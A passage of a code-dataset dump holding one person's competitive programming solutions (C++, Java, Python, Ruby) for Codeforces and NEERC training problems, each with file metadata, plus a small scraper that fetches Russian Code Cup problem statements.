is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.36647579073905945, "alphanum_fraction": 0.40760019421577454, "avg_line_length": 28.121212005615234, "blob_id": "c12cab7525784ca89693c6ac205ab9bf4ed20d48", "content_id": "ddf3a4ba24a65770dee61d59ea66345cc4068e65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1921, "license_type": "no_license", "max_line_length": 98, "num_lines": 66, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.09.27/H.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\nusing namespace std;\n \n \nbool seg_cross (pair <int, int> p1, pair <int, int> p2){\n int x = p1.first, y = p1.second, x2 = p2.first, y2 = p2.second;\n return ((x < x2 && x2 < y) || (x < y2 && y2 < y) || (x2 < x && x < y2) || (x2 < y && y < y2));\n}\n \nbool f1[100239], f2[100239];\nvector <pair <int, int> > a, a1;\npair <int, int> seg [100239];\n \nint scan(vector <pair <int, int> > a)\n{\n int ans = 0, curr = 0;\n sort(a.begin(), a.end());\n for (int i = 0; i < a.size(); ++i) {\n curr += a[i].second;\n ans = max (ans, curr);\n }\n return ans;\n}\n \nint main() {\n // freopen(\"input.in.c\", \"r\", stdin);\n int t, n;\n cin >> t;\n while (t --> 0){\n cin >> n;\n for (int i = 0; i < n; ++i)\n cin >> seg[i].first >> seg[i].second;\n bool ok = seg_cross(seg[0], seg[1]);\n for (int i = 2; i < n; ++i){\n f1[i] = seg_cross(seg[0], seg[i]);\n f2[i] = seg_cross(seg[1], seg[i]);\n }\n bool _f1 = false, _f2 = false;\n for (int i = 2; i < n; ++i){\n if (f1[i] && !f2[i])\n _f1 = true;\n if (!f1[i] && f2[i])\n _f2 = true;\n }\n ok = (ok || (_f1 && _f2));\n for (int i = 0; i < n; ++i){\n a.push_back(make_pair(seg[i].first, 1));\n a.push_back({seg[i].second, -1});\n a1.push_back(make_pair(seg[i].first, 1));\n a1.push_back({seg[i].second, -1});\n }\n // cout << \"pwqw \" << scan(a) << endl;\n if (ok)\n cout << scan(a) << endl;\n else {\n a.push_back({seg[0].first, 1});\n a.push_back({seg[0].second, -1});\n int temp = scan(a);\n a1.push_back({seg[1].first, 1});\n a1.push_back({seg[1].second, -1});\n cout << min(temp, scan(a1)) << endl;\n }\n a.clear();\n a1.clear();\n }\n}" }, { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 12, "blob_id": "994ca49bcbb3b251553297c9bd8820a04cbfa7a6", "content_id": "3430b84da71afce6d61db7c32dbdd65ed585c79e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13, "license_type": "no_license", "max_line_length": 12, "num_lines": 1, "path": "/CodeForce/0952/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print('Odd')\n" }, { "alpha_fraction": 0.510954737663269, "alphanum_fraction": 0.5239084959030151, "avg_line_length": 25.38396644592285, "blob_id": "e6d54ba0589028a00c758da478b487581e92bd05", "content_id": "84bd135c9199565f5f29f648493958226327bf1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6253, "license_type": "no_license", "max_line_length": 174, "num_lines": 237, "path": "/CodeForce/0940/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\ntemplate<typename T>\nstruct query\n{\n int l;\n int r;\n int i;\n int updates;\n T q;\n\n int lb;\n int rb;\n\n query(int b, int l, int r, int i, int updates, const T& q) : l(l), r(r), i(i), updates(updates), q(q) \n {\n this->lb = l / b;\n this->rb = r / b;\n }\n};\n\ntemplate<typename S, typename T, typename U>\nstruct MOWithUpdates\n{\n int n;\n int b = 0;\n vector<query<T>> queries;\n vector<U> updates;\n vector<S> answers;\n\n const void f(int);\n void (*addLeft)(int);\n void (*addRight)(int);\n void (*delLeft)(int);\n void (*delRight)(int);\n void (*update)(int, int, int, bool, const U&);\n S (*getAnswer)(int, int, const T&);\n\n void addQuery(int l, int r, const T& t) {\n int i = queries.size();\n queries.push_back(query(b, l, r, i, updates.size(), t));\n }\n\n void addUpdate(const U& u) {\n updates.push_back(u);\n }\n\n MOWithUpdates(\n unsigned int maxN,\n unsigned int maxQ,\n void addLeft(int),\n void addRight(int),\n void delLeft(int),\n void delRight(int),\n void update(int, int, int, bool, const U&),\n S getAnswer(int, int, const T&)\n ) {\n queries.reserve(maxQ);\n updates.reserve(maxQ);\n n = maxN;\n b = pow(n, 2. / 3);\n this->addLeft = addLeft;\n this->addRight = addRight;\n this->delLeft = delLeft;\n this->delRight = delRight;\n this->update = update;\n this->getAnswer = getAnswer;\n }\n\n vector<S> go(\n ) {\n answers.resize(queries.size());\n sort(all(queries), [&](const auto& a, const auto& b) {\n if (a.lb != b.lb)\n return a.lb < b.lb;\n if (a.rb != b.rb)\n return a.lb & 1 ? a.rb < b.rb : a.rb > b.rb;\n return a.lb & 1 ^ a.rb & 1 ? a.updates < b.updates : a.updates > b.updates;\n });\n\n int L = 0;\n int R = -1;\n int E = 0;\n\n for (const auto& [l, r, id, t, q, _, __]: queries) \n {\n while (E < t) { update(E, L, R, true, updates[E]); ++E; }\n while (E > t) { --E; update(E, L, R, false, updates[E]); }\n while (L > l) addLeft(--L);\n while (R < r) addRight(++R);\n while (L < l) delLeft(L++);\n while (R > r) delRight(R--);\n answers[id] = getAnswer(l, r, q);\n }\n return answers;\n }\n};\n\nmap<int, int> coords;\nvector<int> a;\nvector<int> m;\nvector<int> diffsCNT;\n\nvoid er(int x) {\n --diffsCNT[x];\n}\n\nvoid ad(int x) {\n ++diffsCNT[x];\n}\n\nvoid add(int id) {\n int x = a[id];\n er(m[x]);\n ad(++m[x]);\n}\n\nvoid del(int id) {\n int x = a[id];\n er(m[x]);\n ad(--m[x]);\n}\n\nvoid update(int index, int L, int R, bool forward, const array<int, 3>& update) {\n auto [i, from, to] = update;\n if (!forward) to = from;\n if (L <= i && i <= R)\n del(i);\n a[i] = to;\n if (L <= i && i <= R)\n add(i);\n}\n\nint get(int x) {\n auto it = coords.find(x);\n if (it != coords.end())\n return it->second;\n int sz = coords.size();\n return coords[x] = sz;\n}\n\nint answer(int l, int r, const int&) {\n for (int mex = 1; ; ++mex)\n if (diffsCNT[mex] == 0)\n return mex;\n return -1;\n}\n\n//MO with updates\nvoid run()\n{\n ints(n, q);\n a.resize(n);\n m.resize(n + q + 10);\n diffsCNT.resize(n);\n \n readln(a);\n for (int& x: a)\n x = get(x);\n\n MOWithUpdates<int, int, array<int, 3>> MO(n, q, add, add, del, del, update, answer);\n fori(q)\n {\n ints(type, l, r); --l;\n if (type == 1)\n MO.addQuery(l, --r, 0);\n else\n {\n r = get(r);\n MO.addUpdate({l, a[l], r});\n a[l] = r;\n }\n }\n for (int i = SZ(MO.updates) - 1; i >= 0; --i)\n a[MO.updates[i][0]] = MO.updates[i][1];\n\n auto ans = MO.go();\n for (int& x: ans)\n writeln(x);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.39814406633377075, "alphanum_fraction": 0.40388864278793335, "avg_line_length": 21.83333396911621, "blob_id": "444d1149d18851a364020c3c06d13d0b70b95b8c", "content_id": "f27e3468d414c173aebaef78e85f464730b88a7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4526, "license_type": "no_license", "max_line_length": 87, "num_lines": 198, "path": "/trains/trainEpisode6/Solution.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\nimport java.math.BigInteger;\nimport java.util.Map.Entry;\nimport static java.lang.Math.*;\n\npublic class Solution\n{\n int k = 16;\n\n class Team implements Comparable<Team>\n {\n String name;\n int time, n;\n int[] l = new int[k];\n int[] count = new int[k];\n int[] ac = new int[k];\n boolean[] solved = new boolean[k];\n\n public Team(String name)\n {\n this.name = name;\n time = 0;\n }\n\n @Override\n public int compareTo(Team t)\n {\n int cmp = f(this, t);\n if (cmp != 0)\n return cmp;\n return name.compareTo(t.name);\n }\n }\n\n int f(Team a, Team b)\n {\n int cmp = Integer.compare(b.n, a.n);\n if (cmp != 0)\n return cmp;\n cmp = Integer.compare(a.time, b.time);\n if (cmp != 0)\n return cmp;\n for (int i = a.n; i >= 0; --i)\n {\n cmp = Integer.compare(a.ac[i], b.ac[i]);\n if (cmp != 0)\n return cmp;\n cmp = Integer.compare(a.l[i], b.l[i]);\n if (cmp != 0)\n return cmp;\n }\n return 0;\n }\n\n void run()\n {\n int tests = nextInt();\n\n while (--tests >= 0)\n {\n int n = nextInt(), m = nextInt();\n Team[] team = new Team[n];\n Map<String, Integer> id = new HashMap<String, Integer>(n + 3);\n for (int i = 0; i < n; i++)\n {\n String s = next();\n team[i] = new Team(s);\n id.put(s, i);\n }\n\n while (--m >= 0)\n {\n int time = nextInt();\n int i = id.get(next());\n int problem = next().codePointAt(0) - 'A';\n boolean ok = next().equals(\"accepted\");\n if (ok)\n {\n if (team[i].solved[problem])\n continue;\n team[i].solved[problem] = true;\n team[i].time += time + team[i].count[problem] * 20;\n team[i].ac[team[i].n] = time;\n team[i].l[team[i].n++] = team[i].time;\n\n }\n else\n team[i].count[problem]++;\n }\n Arrays.sort(team);\n\n for (int i = 0, j = 0; i < n; i++)\n {\n if (i == 0 || f(team[i], team[i - 1]) != 0)\n out.print(j = i + 1);\n else\n out.print(j);\n out.println(\" \" + team[i].name + \" \" + team[i].n + \" \" + team[i].time);\n }\n }\n\n }\n\n int[][] nextMatrix(int n, int m)\n {\n int[][] matrix = new int[n][m];\n\n for (int i = 0; i < n; i++)\n for (int j = 0; j < m; j++)\n {\n matrix[i][j] = nextInt();\n }\n\n return matrix;\n }\n\n String next()\n {\n while (!st.hasMoreTokens())\n {\n st = new StringTokenizer(nextLine());\n }\n\n return st.nextToken();\n }\n\n boolean hasNext()\n {\n while (!st.hasMoreTokens())\n {\n String line = nextLine();\n\n if (line == null)\n {\n return false;\n }\n\n st = new StringTokenizer(line);\n }\n\n return true;\n }\n\n int[] nextArray(int n)\n {\n int[] array = new int[n];\n\n for (int i = 0; i < n; i++)\n {\n array[i] = nextInt();\n }\n\n return array;\n }\n\n int nextInt()\n {\n return Integer.parseInt(next());\n }\n\n long nextLong()\n {\n return Long.parseLong(next());\n }\n\n double nextDouble()\n {\n return Double.parseDouble(next());\n }\n\n String nextLine()\n {\n try\n {\n return in.readLine();\n }\n catch (IOException err)\n {\n return null;\n }\n }\n\n static PrintWriter out;\n static BufferedReader in;\n static StringTokenizer st = new StringTokenizer(\"\");\n static Random rnd = new Random();\n\n public static void main(String[] args) throws IOException\n {\n out = new PrintWriter(System.out);\n // out = new PrintWriter(new File(\"hc.txt\"));\n in = new BufferedReader(new InputStreamReader(System.in));\n new Solution().run();\n out.close();\n in.close();\n }\n}\n\n\n\n\n\n" }, { "alpha_fraction": 0.45922499895095825, "alphanum_fraction": 0.46876806020736694, "avg_line_length": 37.42222213745117, "blob_id": "6ecabf71b0b30403c7e0e3adadaef414ad353651", "content_id": "821f1c8361d1efffb85aaae260d576f7f6809579", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3458, "license_type": "no_license", "max_line_length": 928, "num_lines": 90, "path": "/CodeForce/0391/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nint n, m, k;\nvector<pii> a;\n\nvoid run()\n{\n readln(n, k);\n int x, y;\n ll sum = 0ll;\n fori(n)\n readln(x, y),\n a.pb({x, y}),\n sum += y;\n ll ans = 0ll;\n int current = 0, rr;\n forn(wwww, max(1, n - 1))\n {\n n = a.size();\n sort(a.begin() + current, a.end());\n fori(n)\n cout << a[i].first << \" \" << a[i].second << endl;\n if (k == n + 1 || k == 1 || n < a[n - k].first - current)\n {\n if (k == n + 1)\n cout << 0 << endl;\n else\n if (n < a[n - k].first - current)\n cout << \"-1\\n\";\n else\n if (k == 1)\n cout << sum << endl;\n return;\n }\n int need = a[n - k].first - current;\n bool flag = false;\n writeln(need);\n if (need == 0)\n flag = true,\n need++;\n// cout << ans << endl;\n sort(a.begin() + current, a.end(), [](pii q, pii w){return q.second < w.second;});\n fori(need)\n ans += a[i + current].second;\n for(int i = need; i < n; i++)\n a[i].first++;\n// a.erase(a.begin(), a.begin() + need);\n rr = current;\n current += need;\n if (flag)\n {\n int mx = 0;\n fori(rr)\n mx = max(mx, a[i].second);\n ans -= mx;\n break;\n }\n }\n cout << ans << endl;\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4973627030849457, "alphanum_fraction": 0.5147378444671631, "avg_line_length": 40.32051467895508, "blob_id": "0d57dd33034f788339979dba4514cc951eb911e3", "content_id": "1b5733994c4ae9533e5fbbca63017aa0bf9ca25f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3223, "license_type": "no_license", "max_line_length": 928, "num_lines": 78, "path": "/trash/E218.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <math.h>\n#include <algorithm>\n#include <queue>\n#include <map>\n\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll unsigned long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"start\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nvoid wr(vector<ll> &a)\n{\n forn(i, a.size())\n cout << a[i] << \" \";\n enter;\n}\n\nvoid run()\n{\n int n, k, x;\n vector<pair<int, int> > a;\n readln(n);\n forn(i, n)\n scanf(\"%d\", &x),\n a.pb({x, i + 1});\n readln(k);\n sort(a.begin(), a.end());\n vector<ll> sums, all, sums2, all2;\n sums.push_back(0);\n all.push_back(0);\n sums2.push_back(0);\n all2.push_back(0);\n forn(i, n - 1)\n sums.push_back(((ll)(a[i + 1].first - a[i].first)) * (i + 1) + sums.back()),\n all.push_back(all.back() + sums.back()),\n sums2.push_back(((ll)(a[n - i - 1].first - a[n - i - 2].first)) * (i + 1) + sums2.back()),\n all2.push_back(all2.back() + sums2.back());\n reverse(sums2.begin(), sums2.end());\n reverse(all2.begin(), all2.end());\n sums2.pb(0);\n ll mn = all[k - 1], current;\n int index = k - 1;\n for (int i = k; i < n; i++)\n {\n current = (all[i] + all2[i - k + 1] + ((ll)(a[i + 1].first - a[i - k].first)) * (i - k + 1) * (n - i - 1) +\n sums[i - k] * (n - i - 1) + sums2[i + 1] * (i - k + 1) - all2[0]);\n if (current < mn)\n mn = current,\n index = i;\n }\n for (int i = index - k + 1; i <= index; i++)\n printf(\"%d \", a[i].second);\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.362059623003006, "alphanum_fraction": 0.39295393228530884, "avg_line_length": 24.27397346496582, "blob_id": "f4b448a4c1d8a062731ac840c5fe8778a981de16", "content_id": "e5bfd6ac74392a43155da352ca2b1b2285d62f82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1845, "license_type": "no_license", "max_line_length": 75, "num_lines": 73, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.29/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <stdio.h>\n#include <queue>\n#include <algorithm>\n#include <cmath>\n\nusing namespace std;\n\nstruct tri\n{\n int x, y, i;\n tri(){}\n tri(int x, int y, int z)\n {\n this->x = x;\n this->y = y;\n this->i = z;\n }\n bool operator<(tri const& a) const\n {\n if (y == a.y)\n return x < a.x;\n return y < a.y;\n }\n};\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n //freopen(\"output.txt\", \"w\", stdout);\n int n, a, b;\n scanf(\"%d %d %d\\n\", &n, &a, &b);\n\n vector<tri> a1, a2, a3, a4;\n int x, y;\n for (int i = 0; i < n; i++)\n {\n scanf(\"%d %d\", &x ,&y);\n a1.push_back(tri(x, y, i + 1));\n }\n sort(a1.begin(), a1.end());\n long long count = 0;\n for (int i = 0; i < a1.size(); i++)\n {\n if (a1[i].x == 1)\n if (a2.size() < a && a2.size() + a3.size() + a4.size() < a + b)\n a2.push_back(a1[i]),\n count += a1[i].y;\n if (a1[i].x == 2)\n if (a3.size() < b && a2.size() + a3.size() + a4.size() < a + b)\n a3.push_back(a1[i]),\n count += a1[i].y;\n if (a1[i].x == 3)\n if (a2.size() + a3.size() + a4.size() < a + b)\n a4.push_back(a1[i]),\n count += a1[i].y; else\n break;\n }\n cout << a2.size() + a3.size() + a4.size() << \" \" << count << endl;\n int k = 1;\n for (int i = 0; i < a2.size(); i++, k++)\n printf(\"%d %d\\n\", a2[i].i, k);\n int j = 0;\n for (int i = 0; i < min(a - a2.size(), a4.size()); i++, j++, k++)\n printf(\"%d %d\\n\", a4[i].i, k);\n k = max(a + 1, k);\n for (int i = 0; i < a3.size(); i++, k++)\n printf(\"%d %d\\n\", a3[i].i, k);\n for (int i = j; i < a4.size(); i++, k++)\n printf(\"%d %d\\n\", a4[i].i, k);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5535714030265808, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 27, "blob_id": "235dac81e4145083c3dd1d68cacad534da8ce527", "content_id": "05e53a03b25d360674ff80178d933a43f70fde47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 38, "num_lines": 2, "path": "/CodeForce/0769/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nprint(sorted(input().split())[n // 2])\n" }, { "alpha_fraction": 0.38978493213653564, "alphanum_fraction": 0.4032258093357086, "avg_line_length": 18.578947067260742, "blob_id": "4e4feab9792266e2265195edfac8ee602ce30631", "content_id": "34bc734960ffee0f61ea72987fc5331dd67204c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1488, "license_type": "no_license", "max_line_length": 81, "num_lines": 76, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.01/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n\nusing namespace std;\n\nvector< vector<int> > edges;\nvector<int> d;\nvector<bool> used;\nint n, m, k;\n\nbool dfs(int v)\n{\n if (used[v])\n return false;\n used[v] = true;\n for (int i = 0; i < edges[v].size(); i++)\n {\n int u = edges[v][i];\n if (d[u] == -1 || dfs(d[u]))\n {\n d[u] = v;\n return true;\n }\n }\n return false;\n}\n\nvoid run()\n{\n scanf(\"%d\\n\", &n);\n edges.clear();\n edges.resize(n + 1);\n d.clear();\n d.resize(n + 1, -1);\n char x;\n for (int i = 0; i < n; i++)\n {\n for (int j = 0; j < n; j++)\n {\n scanf(\"%c\", &x);\n if (x == '1')\n edges[i].push_back(j);\n }\n scanf(\"\\n\");\n }\n// for (int i = 0; i < n; i++)\n // for (int j = 0; j < edges[i].size(); j++)\n // printf(\"%d%c\", edges[i][j], j == edges[i].size() - 1 ? '\\n' : ' ');\n int c = 0;\n for (int i = 0; i < n; i++)\n {\n used.clear();\n used.resize(n + 1, false);\n dfs(i);\n }\n \tfor (int i = 0; i < n; i++)\n\t\tif (d[i] != -1)\n c++;\n //printf(\"%d\\n\", c);\n printf(c % 4 == 0 ? \"YES\\n\" : \"NO\\n\");\n}\n\nint main()\n{\n freopen(\"matching.in\", \"r\", stdin);\n freopen(\"matching.out\", \"w+\", stdout);\n int T;\n scanf(\"%d\\n\", &T);\n for (int TT = 0; TT < T; TT++)\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.45384615659713745, "alphanum_fraction": 0.4769230782985687, "avg_line_length": 20.66666603088379, "blob_id": "b281bcbea2212795dbde9225daf3f90ef0f7f599", "content_id": "6af818799cb82a9ffff1831ff949086669edf3ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 130, "license_type": "no_license", "max_line_length": 77, "num_lines": 6, "path": "/CodeForce/0411/allLanguages/rb.rb", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "line=gets()\nif (line =~ /.{5,}/ && line =~ /[0-9]/ && line =~ /[A-Z]/ && line =~ /[a-z]/)\nputs \"Correct\"\nelse\nputs \"Too weak\"\nend\n" }, { "alpha_fraction": 0.4474138021469116, "alphanum_fraction": 0.46336206793785095, "avg_line_length": 27.64197540283203, "blob_id": "e83d9cbe34c0fd49b193142cbcec0f23ebd64270", "content_id": "cfede11cc915a0684f9d41b2ea6eed6bdc96d07f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2320, "license_type": "no_license", "max_line_length": 96, "num_lines": 81, "path": "/2015/RCC1C/rcc.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import requests\nfrom html.parser import HTMLParser\nimport re\n\nroundId = 38\n\ndef entity2char(x):\n if x.startswith('&#x'):\n return chr(int(x[3:-1],16))\n elif x.startswith('&#'):\n return chr(int(x[2:-1]))\n else:\n if x == 'x2264' or x == '8804':\n return '<='\n if x == 'xab' or x == 'xbb':\n return '\"'\n return 'FAIL ' + x + ' FAIL'\n\nclass RCCParser(HTMLParser):\n\n def __init__(self):\n HTMLParser.__init__(self)\n self.parsing = -1\n self.problem = ''\n self.su = False\n\n def handle_starttag(self, tag, attrs):\n if tag == 'div':\n if self.parsing > 0:\n self.parsing += 1\n try:\n (x, y) = attrs[0]\n if x == 'class' and y == 'container prog-task-detail':\n self.parsing = 1\n except:\n 42\n elif tag == 'p':\n self.problem += '\\n'\n elif tag == 'sub':\n if self.parsing > 0:\n self.problem += '_'\n self.su = True\n elif tag == 'sup':\n if self.parsing > 0:\n self.problem += '^'\n self.su = True\n def handle_endtag(self, tag):\n if tag == 'div':\n if self.parsing > 0:\n self.parsing -= 1\n\n def handle_data(self, data):\n if self.parsing > 0:\n if self.su and ('-' in data or '+' in data or '*' in data or '/' in data):\n data = '(' + data + ')'\n self.su = False\n self.problem += data\n\n def handle_entityref(self, name):\n if self.parsing > 0:\n self.problem += self.unescape(('&%s;' % name))\n\n def handle_charref(self, name):\n if self.parsing > 0:\n self.problem += entity2char(name)\n\nindexes = ['A', 'B', 'C', 'D', 'E']\n\nfor index in indexes:\n url = 'http://www.russiancodecup.ru/championship/round/{}/problem/{}'.format(roundId, index)\n x = RCCParser()\n x.feed(requests.post(url).text)\n p = x.problem\n p = re.sub(r' +', ' ', p)\n p = re.sub(r'\\n\\s+', '\\n', p)\n p = re.sub(r'^\\n*', '', p)\n splited = 2\n if index != indexes[0] and index != indexes[-1]:\n splited = 3\n p = p.rsplit('\\n', splited)[0]\n open(index + '.problem', 'w').write(p + '\\n')\n" }, { "alpha_fraction": 0.3441033959388733, "alphanum_fraction": 0.35379645228385925, "avg_line_length": 17.75757598876953, "blob_id": "218617939c6c1d26db7549a4f5349b971a7d5922", "content_id": "76d81480bf5457d53ac47d909d3eab68f82cdeb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 619, "license_type": "no_license", "max_line_length": 53, "num_lines": 33, "path": 